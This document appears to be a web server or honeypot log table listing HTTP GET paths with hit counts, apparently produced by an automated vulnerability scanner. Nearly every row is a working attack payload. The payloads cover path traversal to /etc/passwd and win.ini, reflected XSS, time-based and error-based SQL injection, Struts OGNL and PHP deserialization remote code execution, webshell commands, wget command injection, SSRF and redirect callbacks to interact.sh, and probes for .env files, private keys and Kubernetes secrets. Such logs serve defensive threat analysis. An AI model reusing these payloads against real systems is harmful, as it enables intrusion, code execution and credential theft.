1 | GET | /hosts |
HTTP/1.1 |
1 | GET | /hoteldruid/inizio.php |
HTTP/1.1 |
2 | GET | /hoteldruid/visualizza_tabelle.php?anno=2019&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&cerca_id_passati=1&id_sessione&num_cambia_pren=1&subtotale_selezionate=1&tipo_tabella=prenotazioni |
HTTP/1.1 |
1 | GET | /hp/device/DeviceInformation/View |
HTTP/1.1 |
2 | GET | /hp/device/this.LCDispatcher |
HTTP/1.1 |
2 | GET | /hp/device/webAccess/index.htm?content=security |
HTTP/1.1 |
1 | GET | /htaccess.txt |
HTTP/1.1 |
1 | GET | /htaccess_for_page_not_found_redirects.htaccess |
HTTP/1.1 |
1 | GET | /html/common/forward_js.jsp?FORWARD_URL=http[:]//www[.]interact[.]sh |
HTTP/1.1 |
1 | GET | /html/device-id |
HTTP/1.1 |
1 | GET | /html/log |
HTTP/1.1 |
1 | GET | /html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh |
HTTP/1.1 |
1 | GET | /html/repository |
HTTP/1.1 |
1 | GET | /html/setup.html |
HTTP/1.1 |
1 | GET | /htmlcode/html/indexdefault.asp |
HTTP/1.1 |
1 | GET | /htmltopdf/downfile.php?filename=/windows/win.ini |
HTTP/1.1 |
2 | GET | /http[:]//13[.]67[.]44[.]234/.well-known/security.txt |
HTTP/1.1 |
1 | GET | /http[:]//13[.]67[.]44[.]234/http:/13.67.44.234/robots.txt |
HTTP/1.1 |
2 | GET | /http[:]//13[.]67[.]44[.]234/robots.txt |
HTTP/1.1 |
1 | GET | /http[:]//13[.]67[.]44[.]234/security.txt |
HTTP/1.1 |
1 | GET | /http_header.php |
HTTP/1.1 |
1 | GET | /httpd.conf |
HTTP/1.1 |
1 | GET | /hue/assets/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd |
HTTP/1.1 |
2 | GET | /hui/index.html |
HTTP/1.1 |
2 | GET | /human.aspx |
HTTP/1.1 |
1 | GET | /hw-sys.htm |
HTTP/1.1 |
2 | GET | /hybridity/ui/hcx-client/index.html |
HTTP/1.1 |
4 | GET | /i.php |
HTTP/1.1 |
1 | GET | /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /iPages/i_login.asp |
HTTP/1.1 |
1 | GET | /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd |
HTTP/1.1 |
2 | GET | /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd |
HTTP/1.1 |
1 | GET | /identification.php |
HTTP/1.1 |
2 | GET | /idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https[:]// |
HTTP/1.1 |
1 | GET | /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /if.cgi?B_apply=APPLY&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282LM9c5qGtPvk3h4NSCXQBZETiJu%29%3C%2Fscript%3E&failure=fail.htm&max_tcp=3&radio_ping_block=0&redirect=setting.htm&type=ap_tcps_apply |
HTTP/1.1 |
1 | GET | /if.cgi?B_apply=APPLY&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282LNn6Xl2jh4cSr9WhSBMnJJa0rg%29%3C%2Fscript%3E&failure=fail.htm&max_tcp=3&radio_ping_block=0&redirect=setting.htm&type=ap_tcps_apply |
HTTP/1.1 |
2 | GET | /image/image%253A%252F%252F%252e%252e%25252fetc%25252fpasswd |
HTTP/1.1 |
1 | GET | /images../.git/config |
HTTP/1.1 |
1 | GET | /images/..%252fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), |
HTTP/1.1 |
2 | GET | /images/..%252finfo.html |
HTTP/1.1 |
1 | GET | /images/favicon.ico |
HTTP/1.1 |
2 | GET | /images/icons_title.gif |
HTTP/1.1 |
1 | GET | /images/json |
HTTP/1.1 |
1 | GET | /images/versalogo2.png |
HTTP/1.1 |
1 | GET | /imp/login.php |
HTTP/1.1 |
1 | GET | /include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /include/downmix.inc.php |
HTTP/1.1 |
1 | GET | /include/makecvs.php?Event=%60wget%20http%3A%2F%2F%60 |
HTTP/1.1 |
2 | GET | /include/thumb.php?dir=.....///http/.....///config/config_db.php |
HTTP/1.1 |
2 | GET | /include/thumb.php?dir=http/.....///.....///config/config_db.php |
HTTP/1.1 |
1 | GET | /include/thumb.php?dir=http\\..\\admin\\login\\login_check.php |
HTTP/1.1 |
1 | GET | /include/thumb.php?dir=http\\\\..\\\\..\\\\config\\\\config_db.php |
HTTP/1.1 |
1 | GET | /includes/.gitignore |
HTTP/1.1 |
1 | GET | /includes/mysql2i/mysql2i.func.php |
HTTP/1.1 |
3 | GET | /index%20js |
HTTP/1.1 |
1 | GET | /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
1 | GET | /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
2 | GET | /index.action?redirect:http[:]//www[.]interact[.]sh/ |
HTTP/1.1 |
1 | GET | /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
1 | GET | /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /index.action |
HTTP/1.1 |
2 | GET | /index.asp |
HTTP/1.1 |
5 | GET | /index.html |
HTTP/1.1 |
3 | GET | /index.json |
HTTP/1.1 |
2 | GET | /index.jsp |
HTTP/1.1 |
1 | GET | /index.php.bak |
HTTP/1.1 |
1 | GET | /index.php/Pan/ShareUrl/downloadSharedFile?file_name=win.ini&true_path=../../../../../../windows/win.ini |
HTTP/1.1 |
2 | GET | /index.php/admin/admin/login/index/ |
HTTP/1.1 |
1 | GET | /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd |
HTTP/1.1 |
2 | GET | /index.php/catalogsearch/advanced/result/?name=e |
HTTP/1.1 |
1 | GET | /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /index.php/component/chronoforums2/profiles/avatar/u1?av=../../../../../../../etc/passwd&tvout=file |
HTTP/1.1 |
1 | GET | /index.php/install/ |
HTTP/1.1 |
2 | GET | /index.php/install |
HTTP/1.1 |
1 | GET | /index.php/interact.sh |
HTTP/1.1 |
1 | GET | /index.php/login |
HTTP/1.1 |
1 | GET | /index.php/video/?dl=aHR0cDovL2ludGVyYWN0LnNoLw== |
HTTP/1.1 |
1 | GET | /index.php5 |
HTTP/1.1 |
2 | GET | /index.php?Itemid=12&option=com_jimtawl&task=../../../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?Itemid=128&option=com_album&target=../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?SQ=0&btn_submit.x=0&btn_submit.y=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search |
HTTP/1.1 |
1 | GET | /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%222LNn69ogJ0F6ZUHlXgXqIDQvk6D.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B |
HTTP/1.1 |
2 | GET | /index.php?a=logout&c=Users&m=user&referurl=https[:]//interact[.]sh |
HTTP/1.1 |
2 | GET | /index.php?action=../../../../../../../../etc/passwd&option=com_agora&page=avatars&task=profile |
HTTP/1.1 |
2 | GET | /index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /index.php?action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd&option=com_extplorer |
HTTP/1.1 |
1 | GET | /index.php?advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype&p=banlist |
HTTP/1.1 |
1 | GET | /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E |
HTTP/1.1 |
1 | GET | /index.php?auth=582f27d140497a9d8f048ca085b111df&c=api&m=data2¶m=action=sql%20sql=%27select%20md5(999999999)%27 |
HTTP/1.1 |
1 | GET | /index.php?c=api&format=php&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&m=data2 |
HTTP/1.1 |
2 | GET | /index.php?class=../../../../../../../etc/passwd%00 |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_communitypolls |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_realtyna |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../etc/passwd%00&option=com_properties |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_bfsurvey |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_jradio |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_kp |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_abbrev |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_arcadegames |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ckforms |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_datafeeds |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_drawroot |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_fabrik |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_horoscope |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_if_surfalert |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_janews |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jfeedback |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_joomlaflickr |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jphone |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jprojectmanager |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jvehicles |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jvideodirect |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_lovefactory |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multiroot |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_news_portal |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_noticeboard |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_onlineexam |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_orgchart |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchadownloadsattach |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchafieldsattach |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchaimageattach |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_powermail |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_rokdownloads |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_smartsite |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_userstatus |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_webtv |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcomment |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcore |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_graphics |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_wmi |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../../etc/passwd&option=com_kif_nexus |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../etc/passwd%00&option=com_dwgraphs |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../etc/passwd%00&option=com_jresearch |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../etc/passwd&id=1&option=com_biblestudy&view=studieslist |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../etc/passwd%00&option=com_jcollection |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../etc/passwd%00&option=com_shoutbox |
HTTP/1.1 |
2 | GET | /index.php?controller=../../../../../../../etc/passwd%00&option=com_svmap |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../etc/passwd%00&option=com_tweetla |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../etc/passwd%00&option=com_canteen |
HTTP/1.1 |
1 | GET | /index.php?controller=./../../../../../../../../etc/passwd%00&option=com_jstore |
HTTP/1.1 |
1 | GET | /index.php?controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments |
HTTP/1.1 |
2 | GET | /index.php?controller=CommentGrade&fc=module&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt)&module=productcomments |
HTTP/1.1 |
1 | GET | /index.php?data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==&r=test/sss |
HTTP/1.1 |
1 | GET | /index.php?download=/etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?download_file=../../../../../../../../../../../etc/passwd&option=com_jtagmembersdirectory&task=attachment |
HTTP/1.1 |
2 | GET | /index.php?fileid=../../../../../../../../../../etc/passwd%00&option=com_simpledownload&task=download |
HTTP/1.1 |
1 | GET | /index.php?folder=../../../../etc/passwd&option=com_imagebrowser |
HTTP/1.1 |
2 | GET | /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /index.php?id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&lvl=author_see |
HTTP/1.1 |
2 | GET | /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 |
HTTP/1.1 |
1 | GET | /index.php?include_file=../../../../../../etc/passwd&option=com_pro_desk |
HTTP/1.1 |
1 | GET | /index.php?module=Install&view=Index |
HTTP/1.1 |
1 | GET | /index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?page=....//....//windows/win.ini |
HTTP/1.1 |
1 | GET | /index.php?page=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?page=../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?page=../../windows/win.ini |
HTTP/1.1 |
2 | GET | /index.php?page=/etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?page=etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?page=etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?page=windows/win.ini%00 |
HTTP/1.1 |
1 | GET | /index.php?page=windows/win.ini |
HTTP/1.1 |
1 | GET | /index.php?page_slug=../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?plot=wget%20http[:]// |
HTTP/1.1 |
1 | GET | /index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19--+ |
HTTP/1.1 |
1 | GET | /index.php?q=file:///etc/passwd |
HTTP/1.1 |
2 | GET | /index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19--+ |
HTTP/1.1 |
1 | GET | /index.php?query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)&s=weibo/Share/shareBox |
HTTP/1.1 |
2 | GET | /index.php?query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)&s=weibo/Share/shareBox |
HTTP/1.1 |
1 | GET | /index.php?r=i/../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /index.php?redirect=//interact[.]sh |
HTTP/1.1 |
1 | GET | /index.php?redirect=/\\/interact.sh/ |
HTTP/1.1 |
1 | GET | /index.php?rest_route=/xs-donate-form/payment-redirect/3 |
HTTP/1.1 |
1 | GET | /index.php?route=account/login |
HTTP/1.1 |
1 | GET | /index.php?s=/index/index/name/$%7B@phpinfo()%7D |
HTTP/1.1 |
2 | GET | /index.php?s=/install/index/index |
HTTP/1.1 |
1 | GET | /index.php?s=example |
HTTP/1.1 |
2 | GET | /index.php?sl=../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E |
HTTP/1.1 |
7 | GET | /index.php |
HTTP/1.1 |
2 | GET | /index.vm |
HTTP/1.1 |
2 | GET | /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
3 | GET | /index |
HTTP/1.1 |
3 | GET | /info.json |
HTTP/1.1 |
4 | GET | /info.php |
HTTP/1.1 |
1 | GET | /info/ |
HTTP/1.1 |
3 | GET | /infophp.php |
HTTP/1.1 |
4 | GET | /infos.php |
HTTP/1.1 |
1 | GET | /inizio.php |
HTTP/1.1 |
2 | GET | /install.php?a=check |
HTTP/1.1 |
2 | GET | /install.php?profile=default |
HTTP/1.1 |
2 | GET | /install.php |
HTTP/1.1 |
1 | GET | /install/?step=1 |
HTTP/1.1 |
3 | GET | /install/ |
HTTP/1.1 |
2 | GET | /install/app.php |
HTTP/1.1 |
1 | GET | /install/page_start.php |
HTTP/1.1 |
1 | GET | /install |
HTTP/1.1 |
2 | GET | /installation/index.php |
HTTP/1.1 |
1 | GET | /installer |
HTTP/1.1 |
2 | GET | /interlib/report/ShowImage?localPath=C:\\Windows\\system.ini |
HTTP/1.1 |
2 | GET | /interlib/report/ShowImage?localPath=etc/passwd |
HTTP/1.1 |
2 | GET | /intikal/storage/ |
HTTP/1.1 |
2 | GET | /ipython/tree |
HTTP/1.1 |
1 | GET | /irj/portal |
HTTP/1.1 |
1 | GET | /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f |
HTTP/1.1 |
1 | GET | /jasperserver-pro/login.html?error=1 |
HTTP/1.1 |
1 | GET | /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
1 | GET | /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
2 | GET | /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e |
HTTP/1.1 |
1 | GET | /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin |
HTTP/1.1 |
2 | GET | /jkstatus/ |
HTTP/1.1 |
1 | GET | /jkstatus; |
HTTP/1.1 |
1 | GET | /jkstatus |
HTTP/1.1 |
21 | GET | /jmx-console/ |
HTTP/1.1 |
2 | GET | /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /jolokia/exec/ch[.]qos[.]logback[.]classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml |
HTTP/1.1 |
1 | GET | /jolokia/exec/com[.]sun[.]management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd |
HTTP/1.1 |
1 | GET | /jolokia/list |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion |
HTTP/1.1 |
1 | GET | /jolokia/read/java[.]lang:type=Memory |
HTTP/1.1 |
1 | GET | /jolokia/version |
HTTP/1.1 |
1 | GET | /jpeginfo/jpeginfo.php?url |
HTTP/1.1 |
2 | GET | /jquery-file-upload/server/php/ |
HTTP/1.1 |
2 | GET | /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /js../.git/config |
HTTP/1.1 |
3 | GET | /js/config.js |
HTTP/1.1 |
2 | GET | /js/elFinder.version.js |
HTTP/1.1 |
2 | GET | /js/elfinder.min.js |
HTTP/1.1 |
3 | GET | /js/envConfig.js |
HTTP/1.1 |
1 | GET | /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id |
HTTP/1.1 |
2 | GET | /js/routing?callback=fos.Router.setDatafoobarfoo |
HTTP/1.1 |
1 | GET | /jsapi_ticket.json |
HTTP/1.1 |
1 | GET | /jsonapi/user/user |
HTTP/1.1 |
1 | GET | /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd |
HTTP/1.1 |
1 | GET | /jsp/index.jsp |
HTTP/1.1 |
1 | GET | /jsrpc.php?method=screen.get&mode=1&profileIdx=web.item.graph&profileIdx2=updatexml(0,concat(0xa,user()),0)::&resourcetype=17&type=0 |
HTTP/1.1 |
2 | GET | /juddi/ |
HTTP/1.1 |
2 | GET | /jupyter/hub/lti/launch |
HTTP/1.1 |
2 | GET | /jupyter/lab |
HTTP/1.1 |
1 | GET | /jupyter/login |
HTTP/1.1 |
1 | GET | /jw/web/; |
HTTP/1.1 |
1 | GET | /jwt/private.pem |
HTTP/1.1 |
1 | GET | /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs |
HTTP/1.1 |
1 | GET | /karma.js |
HTTP/1.1 |
1 | GET | /kb_view_customer.do?sysparm_article=KB00xxxx |
HTTP/1.1 |
1 | GET | /keycloak.json |
HTTP/1.1 |
1 | GET | /kfm/admin/ |
HTTP/1.1 |
1 | GET | /kfm/index.php |
HTTP/1.1 |
1 | GET | /knowage/servlet/AdapterHTTP?NEW_SESSION=TRUE&Page=LoginPage&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /kustomization.yml |
HTTP/1.1 |
2 | GET | /kvmlm2/index.dhtml?fname&language=../../../../../../../../../../etc/passwd%00.jpg&lname&sponsor=gdi&template=11 |
HTTP/1.1 |
3 | GET | /kyc/.env.local |
HTTP/1.1 |
3 | GET | /kyc/.env.production |
HTTP/1.1 |
3 | GET | /kyc/.env.staging |
HTTP/1.1 |
